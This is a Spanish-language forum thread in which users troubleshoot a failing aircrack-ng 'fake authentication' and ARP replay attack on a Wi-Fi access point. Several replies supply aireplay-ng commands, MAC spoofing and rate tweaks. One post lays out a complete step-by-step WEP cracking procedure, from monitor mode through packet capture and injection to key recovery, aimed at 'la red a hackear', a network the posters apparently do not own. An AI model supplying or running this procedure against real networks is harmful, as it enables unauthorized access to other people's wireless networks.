La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng)

[Carloswaldo]

A1 es el Ataque 1 (Asociación falsa).

[Casidiablo]

¿Y no es eso lo que estoy tratando de hacer? O sea, la opción -1 del comando aireplay-ng...

[heaviloto]

hola, perdon me e colado, es que con eso de A1 y A3 me lio un poco, xd xd xd xd, queria decir esto exactamente,

- aireplay-ng   -3  -b  (bssid  del AP)  -h   (bessid del  que este conectado)   wlan0 

prueba a poner eso despues de intentar asociarte

un saludo

[Casidiablo]

Muestra esto, y solo esto:

Código [Seleccionar] Expandir

Read 83454 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...

Van aumentando el número de paquetes pero no los ARP ni ACK...

[Casidiablo]

Si hago todo usando la MAC del AP, me sale esto:

Código [Seleccionar] Expandir

aireplay-ng -3 -b 00:1C:10:08:39:15 -h 00:1C:10:08:39:15 wlan0
15:47:10  Waiting for beacon frame (BSSID: 00:1C:10:08:39:15) on channel 6
Saving ARP requests in replay_arp-0116-154710.cap
You should also start airodump-ng to capture replies.
Read 18688 packets (got 0 ARP requests and 6 ACKs), sent 0 packets...(0 pps)

Bueno, siempre y cuando en otra consola tenga corriendo el ataque 1... cada vez que en el fake auth aparece esto: Sending Authentication Request (Open System) [ACK], el número de ACKs crece en el ataque 3 (tiene sentido). Pero aún así, no he podido hacer nada.

Muchas gracias por su ayuda.

[heaviloto]

hola, te suben los datas en el airodump?, si es asi, un poco de paciencia, no siempre es a la preimera, y segun el estado de animo del router, xd xd xd xd xd

un saludo

[fuenteRea]

bajale la rate a la tarjeta ifconfig rate 1M, si tienes un portatil prueba a cambiarte de sitio o apaga y enciende el router porque algunas veces son muy cabezones estos router, un saludo!!
PD: haz el ataque1 de esta manera--> aircrack-ng -1 30 -a BSSID -e ESSID -h BSSID wlan0

[Spanslus9mm]

Buenas, te voy a decir como lo veo yo:

- No se seguro si lo estas haciendo, pero es importante cambiarte la MAC de tu tarjeta (pero no a la del AP) y usar esa misma MAC falseada en la opción -h.

-Con el 0 le estas diciendo que se intente reautentificar continuamente. Dependiendo del modelo de router esto no puede ser adecuado, prueba otros valores como 30 o 20 (se reautentifica cada 30 o 20 segundos)

-Bajar el rate a 1M como dice thedoctor77

Código [Seleccionar] Expandir

iwconfig wlan0 rate 1M

-Puedes probar a añadir la opción -o 1 (Envía solo un tipo de paquetes de cada vez. Por defecto está fijado en múltiples y esto puede confundir a algunos APs)

-Y para terminar hay algunos routers preparados para no responder a este ataque, si pruebas todo lo que te han sugerido y no logras nada quizá no lo puedas hacer.

Saludos

[Lapiz_tola]

hola yo tengo el programa backtrack 3y mi tarjeta de red es atheros y tengo los pasos a seguir de ese programa y si funciona perfectamente es pero que te sirva de algo PARA CAMBIAR A MODO MONITOR
primera terminal
modprobe -r ath_pci

modprobe ath_pci autocreate=monitor

iwconfig (ath1 es mi trjeta de red) mode monitor

airodump-ng (ath1 es mi tarjeta de red)

iwconfig (ath1 es mi tarjeta de red) rate 1M channel (el de la red a hackear)

ifconfig (ath1 es mi tarjeta de red) hw ether 00:11:22:33:44:55

airodump-ng --ivs --bssid (mac-de la que vas a hackear ) -w (cualquier nombre del archivo) -c (canal de la red) (ath1 es mi tarjeta de red)

segunda terminal


aireplay-ng -1 6 -e (nombre de la red) -a (mac-de la que vas a hackear) -h 00:11:22:33:44:55 (ath1 es mi tarjeta de red)


tercera terminal

aireplay-ng -3 -b (mac-de la que vas a hackear) -h 00:11:22:33:44:55 (ath1 es mi tarjeta de red)


para sair de las terminales es ctrl:c
para recuperar la clave en la primera terminal le pones

aircrack-ng (nombre del archivo)-01.ivs
los datos que vienen entre parentesis son los que tienes que cambiar ya cambiados no le pongas los( ) espero y te sirva saludos

[fuenteRea]

Lapiz_tola que dices?, ese no es el problema, leete bien el hilo y no varies el problema, un saludo!!